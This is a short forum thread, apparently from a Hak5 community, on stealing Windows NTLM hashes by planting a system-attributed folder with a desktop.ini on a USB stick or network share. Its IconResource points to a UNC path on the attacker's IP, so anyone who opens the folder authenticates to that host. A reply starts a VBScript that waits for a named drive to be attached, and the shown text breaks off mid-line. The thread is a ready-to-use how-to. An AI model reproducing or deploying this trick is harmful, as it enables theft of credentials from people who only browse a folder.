  1. Just a quick not on that. This method works also on folders which are on a networkshare. I would call it "Bad Folder" now.
  2. After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-2
  3. If you also want to hide the duckywait, you can put its functionality inside of a vbs as well. Ducky.vbs Set Shell = CreateObject( "WScript.Shell" ) Set fso = CreateObject("Scripting.FileSystemObject") Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colME = oWMI.ExecNotificationQuery("Select * from Win32_VolumeChangeEvent") ' Name of the Volume we are after strVolumeName = "BACKUPDISK" ' Watch for new Drives Do Set oLE = colME.NextEvent If oLE.EventType = 2 Then ' New Drive arrived Set d = fso.GetDrive(oLE.DriveName) If d.VolumeName = str
  4. nice, i love the beginning of Alice :)
